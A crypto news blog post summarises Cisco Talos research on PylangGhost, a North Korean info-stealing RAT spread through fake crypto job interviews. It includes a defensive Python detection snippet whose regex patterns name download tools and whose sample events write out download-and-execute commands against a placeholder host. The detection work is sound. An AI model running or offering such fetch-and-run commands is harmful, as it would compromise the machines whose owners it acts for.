North Korea Targets Crypto Jobs With New Malware Scheme

🛡️ North Korea Launches New Crypto Malware Campaign


North Korean hackers are targeting crypto industry professionals with a dangerous new info-stealing malware, according to cybersecurity firm Cisco Talos. The campaign uses fake job listings and malicious tests to steal sensitive data from blockchain developers and wallet users.

The malware — called PylangGhost — is a Python-based remote access trojan (RAT) that gives attackers full control of infected systems.


🔍 What Is PylangGhost?

Cisco Talos has attributed the malware to “Famous Chollima,” a hacking group aligned with North Korea, also known as Wagemole. The malware is a variant of the earlier GolangGhost RAT, and can:

  • Steal cookies and credentials from over 80 browser extensions

  • Target crypto wallets like MetaMask, Phantom, TronLink, and MultiverseX

  • Steal data from password managers like 1Password, NordPass, and Bitski

  • Capture screenshots, collect system info, and maintain remote access

📌 Victims are primarily located in India, with a focus on people with crypto and blockchain experience.


🎯 How the Malware Spreads

The attack begins with fake job listings posing as roles from major companies like Coinbase, Robinhood, or Uniswap. The process follows these steps:

  1. Fake Recruiters: Contact job seekers via email or LinkedIn.

  2. Impersonated Websites: Victims are directed to job test platforms mimicking real crypto firms.

  3. Social Engineering: During a fake video interview, victims are tricked into running malicious commands under the guise of “updating drivers.”

  4. Payload Execution: Once launched, PylangGhost compromises the device and exfiltrates credentials.

🖼️ Fake websites and download instructions are eerily professional-looking.
(Source: Cisco Talos)


🧠 Not AI-Generated

Cisco Talos noted the malware was likely not written with AI tools, as the comments and code structure suggest manual creation by experienced developers — reinforcing the targeted and persistent nature of this campaign.


🚨 Fake Job Scams: A Growing Threat

This isn’t new. In April 2025, North Korean hackers were linked to a similar malware-laced recruitment campaign connected to the $1.4 billion Bybit exploit.

Crypto professionals should:

  • Avoid downloading files or running commands during interviews

  • Verify recruiters and job sites before sharing sensitive information

  • Use security tools to monitor browser extensions and wallet behavior
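
For defenders, the point in the fake interview where the victim runs a command (step 3 under "How the Malware Spreads") is where endpoint telemetry can catch the lure. The sketch below is an added example, not code from Cisco Talos or the original article: it scores process-creation events for download-then-run one-liners typed into a shell. The patterns, the field names (`host`, `image`, `cmdline`) and the sample events are constructed assumptions, not published indicators.

```python
import re

# Heuristic patterns are assumptions for illustration, not Cisco Talos indicators.
FETCH = re.compile(r"\b(curl|wget|invoke-webrequest|iwr|start-bitstransfer)\b", re.I)
RUN = re.compile(r"\|\s*(sh|bash|zsh|iex)\b|\b(expand-archive|unzip|wscript|cscript|python[3w]?)\b", re.I)
LURE = re.compile(r"driver", re.I)  # the article's "updating drivers" pretext
URL = re.compile(r"https?://\S+", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh", "bash", "zsh", "sh"}

# Constructed process-creation events (hosts, paths and URLs are placeholders).
SAMPLE_EVENTS = [
    {"host": "dev-01", "image": "/bin/bash",
     "cmdline": "curl -o driver_update.zip https://example.invalid/driver_update.zip"
                " && unzip driver_update.zip && python3 update.py"},
    {"host": "dev-02", "image": "/bin/bash",
     "cmdline": "curl -s https://example.invalid/api/health"},
    {"host": "dev-03", "image": "/usr/bin/zsh",
     "cmdline": "python3 manage.py runserver"},
    {"host": "dev-04", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "Invoke-WebRequest https://example.invalid/fix.zip -OutFile fix.zip;"
                " Expand-Archive fix.zip"},
]

def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    image = re.split(r"[\\/]", event["image"])[-1].lower()
    cmd = event["cmdline"]
    # Only shells that download something are of interest here.
    if image not in SHELLS or not (FETCH.search(cmd) and URL.search(cmd)):
        return 0, []
    reasons = ["shell fetches remote content"]
    if RUN.search(cmd):
        reasons.append("unpacks or runs a file in the same command")
    if LURE.search(cmd):
        reasons.append("driver-update wording in the command")
    return len(reasons), reasons

def triage(events, threshold=2):
    """Return (host, score, reasons) for events at or above the threshold."""
    flagged = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            flagged.append((event["host"], score, reasons))
    return flagged

if __name__ == "__main__":
    for host, score, reasons in triage(SAMPLE_EVENTS):
        print(host, score, "; ".join(reasons))
```

A plain health-check `curl` scores 1 and stays below the threshold; legitimate installers that pipe a download into an interpreter will also match, so treat hits as triage leads rather than verdicts.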


🔐 Stay Safe in Web3

As North Korean cyberattacks grow more sophisticated, the crypto industry must stay alert. From malicious Chrome extensions to compromised job offers, these actors are leveraging social engineering and custom RATs to steal user funds and corporate data.

For more crypto security updates and scam alerts, visit https://cryptodicenews.blog
